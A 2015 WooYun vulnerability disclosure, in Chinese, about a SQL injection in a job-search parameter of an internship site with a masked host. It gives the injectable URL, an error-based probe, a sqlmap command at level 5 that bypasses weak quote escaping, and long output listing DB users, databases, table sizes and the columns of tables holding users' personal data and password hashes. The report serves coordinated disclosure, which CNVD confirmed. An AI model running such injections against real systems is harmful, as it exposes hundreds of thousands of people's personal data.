乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-01: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
以前测试过,在职位搜索的时候是可以注入的,即便修复,还是可以增加level获得注入,每天有提交,但是半年过去了,也修复好了,继续抓包寻找,发现了另一处注入。
抓包得到一个注入点如下:
http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1id存在注入http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1'测试,返回错误结果MySQL ErrorMessage: MySQL Query ErrorSQL: select * from shixibao_uchome.mm_postclass_detail WHERE parent_id =1斜杠'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '斜杠'' at line 1Errno.: 1064Click here to seek help.
可以看出'被过滤成“斜杠'”了,但是过滤不严格,仍可导致注入,增加level等级后完全可以绕过过滤进行注入
未添加--level 5测试结果
添加--level 5测试结果
sqlmap.py -u "http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1" --threads 10 --dbms "MySQL" -p id --level 5 --current-db --current-user --is-dba --hostname
sqlmap构造注入参数进行测试
[16:29:08] [INFO] testing MySQL[16:29:08] [INFO] confirming MySQL[16:29:08] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.5.11, Apache 2.4.9back-end DBMS: MySQL >= 5.0.0[16:29:08] [INFO] fetching current usercurrent user: 'admin@%'[16:29:08] [INFO] fetching current databasecurrent database: 'shixibao_uchome'[16:29:08] [INFO] fetching server hostnamehostname: 'WIN-9VCJIM9JGJ2'[16:29:08] [INFO] testing if current user is DBA[16:29:08] [INFO] fetching current usercurrent user is DBA: True[16:23:38] [INFO] testing MySQL[16:23:38] [INFO] confirming MySQL[16:23:38] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.5.11, Apache 2.4.9back-end DBMS: MySQL >= 5.0.0[16:23:38] [INFO] fetching database usersdatabase management system users [8]:[*] ''@'localhost'[*] 'admin'@'%'[*] 'admin'@'localhost'[*] 'cem'@'%'[*] 'pma'@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'::1'[*] 'root'@'localhost'available databases [16]:[*] cdcol[*] cem_db[*] game[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] shixibao[*] shixibao_uc[*] shixibao_uchome[*] shixibao_uchome_20140525[*] test[*] testmql[*] ultrax[*] webauth[*] zhiweibeifenDatabase: shixibao_uchome+----------------------------+---------+| Table | Entries |+----------------------------+---------+| mm_hgz_user | 419959 | 用户| uchome_spaceinfo | 232626 || uchome_creditlog | 77958 || mm_member_view | 43670 || uchome_member | 43670 | 成员| uchome_space | 39361 || uchome_spacefield | 38057 || mm_usereduinfo | 36957 | 用户教育信息| mm_userresumeinfo | 36957 | 用户简历信息| mm_userbaseinfo | 35948 || mm_userinfo | 35948 | 用户信息| mm_zhiweiapply_view | 34043 || mm_zhiweiinfo | 34043 || mm_zhiweiapply_view_1 | 33827 || mm_zhiwei_temp | 33302 || mm_userinfo_zhiweiinfo_all | 32937 || uchome_notification | 22243 || uchome_activity_notice | 22100 || mm_mailqueue | 21633 || mm_youngmembers | 15836 || uchome_resume | 13136 || mm_userskill_map | 6584 || mm_department | 5276 || mm_deptinfo | 5240 || mm_delivery | 4589 || mm_compus_posdeli_view | 4184 || mm_useruniversmap | 4157 || mm_userunivsmap_view | 4157 || mm_personal_zhaopin | 3627 || mm_young_tribe | 3222 || mm_univs | 3209 || mm_user_upload | 2874 || jobcollect | 2494 || mm_company_interest | 2165 || uchome_usertask | 1190 || mm_fam_enterprise | 1100 || mm_company_visitor | 865 || mm_enterprise_zhaopin | 857 || uchome_comment | 817 || uchome_member_third | 732 || mm_post_recommend | 728 || mm_zhiwei_questions | 691 || mm_home_card | 594 || mm_userreg_channel | 559 || mm_follow | 510 || uchome_stat | 502 || mm_zhiwei_send | 428 || mm_city | 357 || uchome_friend | 350 || uchome_coupon | 300 || uchome_pic | 296 || uchome_visitor | 225 || uchome_tagspace | 221 || uchome_tagblog | 217 || uchome_feed | 203 || uchome_tag | 176 || mm_employinfo | 174 || mm_employinfo_view | 174 || mm_score_item | 152 || mm_dept_location | 147 || uchome_zan | 138 || uchome_blogfield | 128 || mm_delivercont_view | 123 || uchome_blog | 122 || uchome_doing | 117 || uchome_config | 108 || mm_score_stat | 106 || mm_lucky_log | 98 || mm_score_mark | 97 || mm_delivery_attach | 94 || uchome_album | 92 || mm_taskuser_map | 89 || mm_score_marker | 81 || mm_themes | 71 || mm_score_task | 68 || uchome_post | 66 || mm_usercode_map | 52 || uchome_creditrule | 47 || uchome_thread | 44 || mm_zhiwei_replayments | 43 || mm_grades_user | 42 || mm_postclass_detail | 38 || mm_provinces | 34 || mm_score_template | 34 || mm_interview_notice | 26 || mm_video_course | 25 || uchome_magic | 25 || mm_young_report | 24 || uchome_magicstore | 24 || mm_score_eachsum | 22 || mm_replayments | 21 || mm_young_report_map | 21 || mm_younger_gd_temp | 20 || mm_taskcompany_map | 18 || mm_attach_files | 15 || mm_lucky_wall | 15 || uchome_click | 15 || mm_subscribe_job | 14 || mm_audition_task | 13 || mm_questions | 13 || uchome_profield | 13 || mm_postclass | 12 || mm_questions_view | 12 || mm_replayments_view | 12 || mm_dynamic | 11 || uchome_event | 11 || uchome_eventfield | 11 || uchome_userevent | 11 || mm_audition_user | 10 || mm_mail_template | 10 || mm_report | 10 || uchome_mtag | 10 || mm_talent_pool | 9 || uchome_poke | 9 || uchome_usergroup | 9 || uchome_data | 8 || mm_jianzhi_delivery | 7 || mm_sys_post | 7 || mm_ztask_classify | 7 || uchome_cron | 7 || uchome_task | 7 || uchome_eventclass | 6 || uchome_job | 6 || uchome_spacelog | 6 || mm_post_attachment | 5 || mm_sys_picplay | 5 || mm_video_wall | 5 || uchome_class | 5 || uchome_polloption | 5 || mm_like | 4 || mm_video_score | 4 || uchome_magicinlog | 4 || mm_grades_enter | 3 || uchome_picfield | 3 || uchome_statuser | 3 || uchome_usermagic | 3 || mm_grade_template | 2 || mm_task | 2 || uchome_eventpic | 2 || uchome_mailqueue | 2 || uchome_report | 2 || mm_compus_news | 1 || mm_score | 1 || mm_strategies | 1 || mm_students_star | 1 || mm_whos_online | 1 || uchome_block | 1 || uchome_home_card | 1 || uchome_invite | 1 || uchome_poll | 1 || uchome_pollfield | 1 || uchome_session | 1 || uchome_show | 1 |+----------------------------+---------+Database: shixibao+-------------------------------------+---------+| Table | Entries |+-------------------------------------+---------+| phome_ecms_zhiwei_crawl_copy | 1382607 || phome_ecms_jianzhi_crawl | 376758 || phome_ecms_zhiwei_crawl_copy_cl | 114558 || phome_ecms_zhiwei_crawl | 56813 || phome_ecms_zhiwei_crawl_sxs_copy | 51662 || phome_ecms_zhiwei | 50579 || ecms_post_mapping | 34324 || mm_zhiweiapply_view | 34043 || phome_ecms_zhiwei_crawl_copy_backup | 19955 || phome_ecms_zhiwei_data_1 | 13547 || phome_ecms_zhiwei_index | 13498 || phome_enewsdolog | 2519 || ecms_post_mapping_history | 1907 || phome_ecms_zhiwei_crawl_test | 1669 || phome_ecms_zhiwei_crawl_1 | 1245 || phome_ecms_zhiwei_crawl_sxs | 1024 || phome_enewsdownerror | 1008 || phome_enewssearch | 942 || phome_ecms_jianzhi_crawl_test | 729 || phome_enewslog | 456 || yjsqzw | 385 || phome_enewsf | 199 || phome_enewsmemberadd | 75 || phome_enewsmember | 73 || phome_enewstempbak | 61 || phome_enewsclass | 56 || phome_enewsclass_stats | 56 || phome_enewsclassadd | 56 || phome_enewstempdt | 56 || phome_enewsdiggips | 52 || phome_ecms_info | 41 || phome_ecms_info_data_1 | 41 || phome_ecms_info_index | 41 || phome_ecms_locationorder | 34 || phome_ecms_news | 34 || phome_ecms_news_data_1 | 34 || phome_ecms_news_index | 34 || phome_ecms_zhiwei_history | 32 || phome_ecms_download | 24 || phome_ecms_download_data_1 | 24 || phome_ecms_download_index | 24 || phome_ecms_movie | 24 || phome_ecms_movie_data_1 | 24 || phome_ecms_movie_index | 24 || phome_ecms_shop | 24 || phome_ecms_shop_data_1 | 24 || phome_ecms_shop_index | 24 || phome_enewsbq | 23 || phome_ecms_article | 18 || phome_ecms_article_data_1 | 18 || phome_ecms_article_index | 18 || phome_enewsbqtemp | 17 || phome_enewslink | 14 || phome_enewslisttemp | 13 || phome_enewstable | 13 || phome_ecms_flash | 12 || phome_ecms_flash_data_1 | 12 || phome_ecms_flash_index | 12 || phome_enewsmemberf | 12 || phome_enewsmod | 12 || phome_enewstempvar | 12 || phome_enewsnewstemp | 11 || phome_enewsfeedbackf | 9 || phome_ecms_photo | 7 || phome_ecms_photo_data_1 | 7 || phome_ecms_photo_index | 7 || phome_enewsshoppayfs | 6 || phome_ecms_tongzhi | 5 || phome_ecms_tongzhi_data_1 | 5 || phome_ecms_tongzhi_index | 5 || phome_enewsfile_1 | 5 || phome_enewsnotcj | 5 || phome_enewsbqclass | 4 || phome_enewsfile_other | 4 || phome_enewsmembergroup | 4 || phome_enewsplayer | 4 || phome_enewsshopps | 4 || phome_enewsuser | 4 || phome_enewsuseradd | 4 || phome_enewsuserloginck | 4 || phome_enewszt | 4 || phome_enewsztadd | 4 || phome_enewsclassnavcache | 3 || phome_enewspage | 3 || phome_enewspayapi | 3 || phome_enewsadminstyle | 2 || phome_enewsclasstemp | 2 || phome_enewsgbook | 2 || phome_enewsmemberform | 2 || phome_enewssearchtemp | 2 || phome_enewsspacestyle | 2 || phome_enewsvotetemp | 2 || phome_enewswapstyle | 2 || phome_ecms_infoclass_news | 1 || phome_enewsadclass | 1 || phome_enewsclass_stats_set | 1 || phome_enewsdo | 1 || phome_enewsfeedbackclass | 1 || phome_enewsfile_member | 1 || phome_enewsgbookclass | 1 || phome_enewsgroup | 1 || phome_enewsindexpage | 1 || phome_enewsinfoclass | 1 || phome_enewsjstemp | 1 || phome_enewsloginfail | 1 || phome_enewspageclass | 1 || phome_enewspicclass | 1 || phome_enewspl_set | 1 || phome_enewspltemp | 1 || phome_enewspostserver | 1 || phome_enewsprinttemp | 1 || phome_enewspublic | 1 || phome_enewspublic_update | 1 || phome_enewspubtemp | 1 || phome_enewsshop_set | 1 || phome_enewstempgroup | 1 || phome_enewsuserlist | 1 || phome_enewsuserlistclass | 1 || phome_enewsztclass | 1 |+-------------------------------------+---------+Database: shixibao_uc+---------------------+---------+| Table | Entries |+---------------------+---------+| uc_members | 52392 || uc_memberfields | 24057 || uc_comments | 739 || uc_notelist | 573 || uc_friends | 144 || uc_pms | 74 || uc_settings | 27 || uc_newpm | 14 || uc_applications | 4 || uc_failedlogins | 2 || uc_protectedmembers | 2 |+---------------------+---------+Database: shixibao_uchome_20140525+---------------------+---------+| Table | Entries |+---------------------+---------+| uchome_spaceinfo | 9899 || uchome_feed | 3915 || uchome_creditlog | 2886 || uchome_space | 1364 || uchome_spacefield | 1343 || mm_member_view | 1335 || uchome_member | 1335 || uchome_resume | 1057 || uchome_statuser | 511 || uchome_visitor | 119 || uchome_config | 108 || uchome_usertask | 77 || mm_department | 75 || uchome_creditrule | 47 || uchome_magic | 25 || uchome_magicstore | 24 || uchome_friend | 16 || uchome_click | 15 || uchome_stat | 12 || uchome_usergroup | 9 || mm_postclass | 7 || uchome_data | 7 || uchome_task | 7 || uchome_eventclass | 6 || uchome_job | 6 || uchome_cron | 5 || uchome_polloption | 5 || uchome_notification | 4 || uchome_event | 3 || uchome_eventfield | 3 || uchome_profield | 3 || uchome_userevent | 3 || uchome_magicinlog | 2 || uchome_usermagic | 2 || mm_deptinfo | 1 || uchome_mailcron | 1 || uchome_mailqueue | 1 || uchome_poll | 1 || uchome_pollfield | 1 |+---------------------+---------+Database: ultrax+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| pre_common_district | 45051 || pre_common_setting | 406 || pre_common_member | 138 || pre_common_member_count | 125 || pre_common_member_field_forum | 125 || pre_common_member_field_home | 125 || pre_common_member_profile | 125 || pre_common_member_status | 125 || pre_common_block_style | 103 || pre_common_syscache | 103 || pre_common_smiley | 85 || pre_forum_statlog | 82 || pre_common_admincp_perm | 67 || pre_common_member_profile_setting | 51 || pre_common_nav | 48 || pre_common_stylevar | 45 || pre_forum_forumfield | 37 || pre_forum_forum | 36 || pre_common_credit_rule | 31 || pre_common_stat | 28 || pre_common_credit_rule_log | 26 || pre_common_cron | 20 || pre_common_onlinetime | 20 || pre_common_usergroup | 20 || pre_common_usergroup_field | 20 || pre_home_click | 15 || pre_common_plugin | 12 || pre_forum_medal | 10 || pre_common_admingroup | 7 || pre_forum_typeoption | 6 || pre_common_admincp_group | 5 || pre_common_friendlink | 5 || pre_forum_post | 5 || pre_forum_post_tableid | 5 || pre_forum_bbcode | 4 || pre_forum_onlinelist | 4 || pre_forum_thread | 4 || pre_forum_grouplevel | 3 || pre_forum_imagetype | 3 || pre_forum_sofa | 3 || pre_common_admincp_session | 2 || pre_common_block | 2 || pre_common_failedlogin | 2 || pre_common_statuser | 2 || pre_common_template_block | 2 || pre_common_word_type | 2 || pre_forum_threadcalendar | 2 || pre_forum_threadhot | 2 || pre_mobile_setting | 2 || pre_mobile_wsq_threadlist | 2 || pre_common_diy_data | 1 || pre_common_style | 1 || pre_common_template | 1 || pre_forum_filter_post | 1 || pre_forum_threadpartake | 1 || pre_forum_threadprofile | 1 || pre_home_favorite | 1 |+-----------------------------------+---------+Database: cem_db+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| cem_circuit_province_calc | 1762584 || cem_circuit_province_quarter_calc | 587528 || cem_kmeans_customer_calc | 439524 || cem_sfactor_pro_customer_calc | 424572 || cem_circuit_qoe | 266167 || cem_sfactor_all_customer_calc | 188592 || data_original_maintain | 161114 || cem_circuit_province_year_calc | 146882 || cem_kmeans_customer_quarter_calc | 146508 || cem_sfactor_pro_customer_quarter_calc | 141524 || cem_circuit_qoe_quarter | 89263 || cem_circuit_calc | 88452 || cem_sfactor_all_customer_quarter_calc | 62864 || cem_maintain | 57285 || cem_kmeans_customer_year_calc | 36627 || cem_sfactor_pro_customer_year_calc | 35381 || cem_circuit_quarter_calc | 29484 || data_original_trouble | 23296 || cem_circuit_qoe_year | 22924 || cem_sfactor_all_customer_year_calc | 15716 || cem_customer_rate | 15305 || data_original_circuit | 12712 || cem_trouble | 12589 || numbers | 10000 || cem_circuit_info | 7371 || cem_circuit_year_calc | 7371 || cem_d_time | 4018 || data_original_kaitong | 909 || cem_kaitong | 830 || buffer_industry_rate | 645 || cem_busi_prefect_rate | 372 || cem_kmeans_province_calc | 372 || cem_sfactor_province_calc | 372 || cem_busi_prefect_rate_quarter | 124 || cem_kmeans_province_quarter_calc | 124 || cem_sfactor_province_quarter_calc | 124 || buffer_customer_circuit | 72 || cem_province | 38 || cem_busi_prefect_rate_year | 31 || cem_kmeans_province_year_calc | 31 || cem_sfactor_province_year_calc | 31 || cem_user_customer_relation | 23 || cem_customer | 22 || cem_customer_selected | 22 || cem_indicator | 16 || cem_industry | 10 || numbers_small | 10 || cem_indicator_expect | 8 || cem_indicator_threshold | 8 || sys_user | 5 || sys_user_role | 5 || sys_role | 4 || cem_business | 3 || cem_data_file | 2 |+---------------------------------------+---------+Database: game+---------------+---------+| Table | Entries |+---------------+---------+| game_outwatch | 16 || game_admin | 4 || game_node | 4 || game_path_map | 3 || game_mobile | 2 || game_path | 2 |+---------------+---------+
Database: shixibao_uchomeTable: mm_userinfo[18 columns]+------------+-----------------------+| Column | Type |+------------+-----------------------+| birthcity | varchar(20) || birthyear | smallint(6) unsigned || edu_degree | smallint(6) || email | varchar(100) || endyear | smallint(6) unsigned || major | varchar(255) || mobile | varchar(40) || msn | varchar(80) || name | char(20) || qq | varchar(20) || residecity | varchar(20) || resumename | varchar(100) || resumeurl | varchar(100) || school | text || sex | tinyint(1) || startyear | smallint(6) unsigned || uid | mediumint(8) unsigned || username | char(15) |+------------+-----------------------+Database: shixibao_uchomeTable: uchome_member[9 columns]+-----------+-----------------------+| Column | Type |+-----------+-----------------------+| companyid | int(50) || deptid | int(20) || hasresume | varchar(255) || isactive | tinyint(4) || mail | varchar(100) || password | char(32) || type | int(5) || uid | mediumint(8) unsigned || username | char(200) |+-----------+-----------------------+Database: shixibao_uchomeTable: mm_hgz_user[18 columns]+------------+--------------+| Column | Type |+------------+--------------+| address | varchar(200) || birth | varchar(200) || degree | varchar(200) || education | text || email | varchar(200) || evaluation | text || height | varchar(200) || hometown | varchar(200) || id | int(10) || intend | text || mobile | varchar(200) || name | varchar(200) || nation | varchar(200) || qq | varchar(200) || sex | varchar(200) || title | varchar(200) || weight | varchar(200) || zzmm | varchar(200) |+------------+--------------+Database: shixibao_uchomeTable: mm_youngmembers[16 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| age | int(5) || city | varchar(100) || gender | int(1) || iskeyperson | int(1) || mail | varchar(200) || major | varchar(64) || name | varchar(200) || phone | varchar(50) || school | varchar(200) || schoolid | int(11) || status | int(10) || tribeid | int(200) || uid | int(10) || updatetime | int(10) || wechatId | varchar(200) || yixinId | varchar(200) |+-------------+--------------+
只列出来一部分,其余的几十万用户就不继续了,还有几千万的数据也不分析了!~~~
继续过滤!~~~
危害等级:高
漏洞Rank:11
确认时间:2015-10-10 17:05
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.
暂无
